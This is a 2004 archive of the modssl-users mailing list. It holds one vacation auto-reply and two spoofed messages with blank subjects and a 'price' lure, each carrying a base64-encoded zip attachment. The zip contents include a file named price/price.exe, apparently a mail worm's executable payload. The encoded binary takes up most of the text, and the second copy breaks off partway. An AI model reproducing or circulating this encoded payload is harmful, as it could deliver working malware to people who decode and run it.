Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.254.14])
	by master.modssl.org (Postfix) with ESMTP id 2BFCEA897A
	for ; Fri, 30 Jul 2004 00:35:52 +0200 (CEST)
Date: Thu, 29 Jul 2004 23:32:47 +0000
From: a.moon@mdx.ac.uk
Subject: The caveats of ./configure --force
To: modssl-users@modssl.org
Message-id: <55B0887C16@mdx-nwsup1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-INTERNAL-IP: 10.13.75.28
X-Autoreply-From: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry I am away on annual leave.  
Please contact OLSU if urgent, otherwise i will get back 
to you as soon as possible on my return on the 2nd August 2004.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 18:35:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 88FE4A8D0B; Mon,  9 Aug 2004 18:35:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from office.net (c-24-20-135-99.client.comcast.net [24.20.135.99])
	by master.modssl.org (Postfix) with SMTP id 2EBC0A8CD1
	for ; Mon,  9 Aug 2004 18:35:50 +0200 (CEST)
Date: Mon, 09 Aug 2004 09:35:45 -0800
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ogpdrqyshdxqzfiezdtq"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ogpdrqyshdxqzfiezdtq
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


 price







----------ogpdrqyshdxqzfiezdtq
Content-Type: application/octet-stream; name="price_08.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price_08.zip"

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

----------ogpdrqyshdxqzfiezdtq--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 18:54:52 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AAF9DA8982; Mon,  9 Aug 2004 18:54:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xpw-llambert.com (pcp08362819pcs.lndsd201.pa.comcast.net [69.136.75.200])
	by master.modssl.org (Postfix) with SMTP id 9C8DBA8945
	for ; Mon,  9 Aug 2004 18:54:46 +0200 (CEST)
Date: Mon, 09 Aug 2004 12:54:43 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------mckhfjjvyawczssgkaxq"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------mckhfjjvyawczssgkaxq
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new price







----------mckhfjjvyawczssgkaxq
Content-Type: application/octet-stream; name="new_price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="new_price.zip"

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
